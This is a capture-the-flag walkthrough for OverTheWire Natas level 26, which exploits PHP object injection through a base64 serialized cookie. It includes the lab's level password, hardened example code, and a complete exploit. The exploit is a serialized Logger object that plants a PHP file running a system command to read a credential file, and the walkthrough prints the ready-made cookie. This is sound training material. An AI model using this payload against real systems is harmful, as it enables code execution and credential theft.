Level 25 - Level 26

Username: natas26
Password: 8A506rfIAXbKKk68yJeuTuRq4UfcK70k
URL:      http://natas26.natas.labs.overthewire.org

Overview

This time we get a page with four inputs and a link to the source code.


Source Code Analysis

Let's take a look at the source code.

There is a class Logger, which writes messages to the file named in its logFile property.

I checked the entire source code, but no object of the Logger class is ever created; it is not used anywhere.

Next, the showImage() function simply outputs the image file. The drawImage() function creates an image with the data returned by the drawFromUserdata() function.

The drawFromUserdata() function first checks for the URL parameters x1, x2, y1 and y2 and, if they exist, generates the image from them. Next it checks whether the cookie drawing exists; if so, it base64-decodes the cookie, unserializes the contents and generates the image from the decoded data. Calling PHP's unserialize() on a cookie value is dangerous, because the cookie can be modified by the user: a crafted cookie can instantiate any class defined on the server with attacker-chosen properties, and that object's magic methods (such as __destruct()) will then run, which is how code ends up being executed. To learn more, check the following resource:

The storeData() function also uses PHP's unserialize() to read the cookie if it is present, and then sets the cookie.
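As an added illustration (not part of this walkthrough and not the Natas source), the following PHP shows the unsafe cookie handling described above beside two hardened alternatives: forbidding object instantiation during unserialize(), and replacing unserialize() with JSON plus an HMAC so a modified cookie is rejected before it is parsed. The function names, the cookie layout and the drawing structure (a list of lines with integer x1, y1, x2, y2 keys) are assumptions made for the example; the key constant is a placeholder.

```php
<?php
// Added example, not from the Natas source. Function names, cookie layout and
// the drawing structure are assumptions for illustration.

// VULNERABLE: unserialize() on user-controlled input. Any class defined on the
// server can be instantiated with attacker-chosen properties, and its
// __wakeup()/__destruct() methods run, so a file-writing class becomes a primitive.
function loadDrawingUnsafe(string $cookie)
{
    return unserialize(base64_decode($cookie));
}

// MITIGATION 1: keep the serialized format but forbid object creation
// (PHP >= 7.0). Every object in the payload becomes a __PHP_Incomplete_Class,
// so no application class's magic methods are triggered.
function loadDrawingNoObjects(string $cookie): array
{
    $data = @unserialize(base64_decode($cookie), ['allowed_classes' => false]);
    return is_array($data) ? $data : [];
}

// MITIGATION 2 (preferred): do not unserialize untrusted data at all. Encode the
// drawing as JSON and bind it to a server-side key with an HMAC, so tampering
// is detected and the cookie discarded before it is parsed.
const DRAWING_COOKIE_KEY = 'PLACEHOLDER-replace-with-a-random-server-secret';

function makeDrawingCookie(array $drawing): string
{
    $payload = json_encode(array_values($drawing));
    $mac = hash_hmac('sha256', $payload, DRAWING_COOKIE_KEY);
    return base64_encode($mac . '.' . $payload);
}

function loadDrawingSafe(string $cookie): array
{
    $raw = base64_decode($cookie, true);
    if ($raw === false || strpos($raw, '.') === false) {
        return [];
    }
    [$mac, $payload] = explode('.', $raw, 2);
    // hash_equals() compares in constant time, so the MAC cannot be guessed byte by byte
    if (!hash_equals(hash_hmac('sha256', $payload, DRAWING_COOKIE_KEY), $mac)) {
        return []; // forged or tampered cookie
    }
    $drawing = json_decode($payload, true);
    if (!is_array($drawing)) {
        return [];
    }
    // Schema check: keep only lines made of exactly four integer coordinates.
    $clean = [];
    foreach ($drawing as $line) {
        if (is_array($line)
            && count($line) === 4
            && isset($line['x1'], $line['y1'], $line['x2'], $line['y2'])
            && count(array_filter($line, 'is_int')) === 4) {
            $clean[] = $line;
        }
    }
    return $clean;
}

// Demonstration with constructed data.
$drawing = [['x1' => 10, 'y1' => 10, 'x2' => 100, 'y2' => 100]];
$cookie = makeDrawingCookie($drawing);
var_dump(loadDrawingSafe($cookie) === $drawing);   // bool(true)

// Edit a coordinate in the JSON part of the cookie and re-encode it: the MAC
// no longer matches, so the drawing is rejected.
[$mac, $payload] = explode('.', base64_decode($cookie), 2);
$tampered = base64_encode($mac . '.' . str_replace('100', '999', $payload));
var_dump(loadDrawingSafe($tampered));              // array(0) {}
```

Run it with `php example.php`. Mitigation 1 is a quick fix for existing code that cannot change its storage format; mitigation 2 is the design to aim for, because a JSON document can never carry an object graph and the HMAC makes the cookie contents authenticated rather than merely parsed.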


Exploiting the Vulnerability

We can leverage the above-mentioned vulnerability to get the password for the next level. For that we need a valid serialized PHP object that reads the password file and writes out its contents. The Logger class we saw earlier is suited to this: because it is a class we can build a valid serialized object from it, and it writes its output to a file.

If we are going to write the password to a file, we have to make sure that the file is publicly accessible, so we must store the output file in a location that we can reach.

From the source code we can see that the image files are located in the img directory, which is publicly accessible, so we can make use of this directory. I copied the Logger class and wrote a PHP script that creates an object of the Logger class, serializes it and base64-encodes the result.

The following PHP script performs the steps described above. I have made a few changes to the __construct() function, setting the messages to PHP snippets that read the contents of the natas27 password file and pointing logFile at img/password.php, which is publicly accessible. The output of the script is a valid cookie [ Ignore the errors generated by the script ].

<?php
    class Logger{
        private $logFile;
        private $initMsg;
        private $exitMsg;

        function __construct(){
            // initialise variables
            $this->initMsg="<?php system('cat /etc/natas_webpass/natas27'); ?>";
            $this->exitMsg="<?php system('cat /etc/natas_webpass/natas27'); ?>";
            $this->logFile = "img/password.php";

            // write initial message
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$this->initMsg);
            fclose($fd);
        }

        function log($msg){
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$msg."\n");
            fclose($fd);
        }

        function __destruct(){
            // write exit message
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$this->exitMsg);
            fclose($fd);
        }
    }
    
    $object = new Logger();
    
    echo base64_encode(serialize($object));
?>

Valid cookie generated by the above script:

Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czoxNjoiaW1nL3Bhc3N3b3JkLnBocCI7czoxNToiAExvZ2dlcgBpbml0TXNnIjtzOjUwOiI8P3BocCBzeXN0ZW0oJ2NhdCAvZXRjL25hdGFzX3dlYnBhc3MvbmF0YXMyNycpOyA/PiI7czoxNToiAExvZ2dlcgBleGl0TXNnIjtzOjUwOiI8P3BocCBzeXN0ZW0oJ2NhdCAvZXRjL25hdGFzX3dlYnBhc3MvbmF0YXMyNycpOyA/PiI7fQ==

I captured the request to the web page using Burp Suite and replaced the value of the drawing cookie with the cookie generated above; the page responded with an error, indicating successful execution of the code.

Getting the Password

Now, to get the password, open the img/password.php file; it contains the credential for the next level.
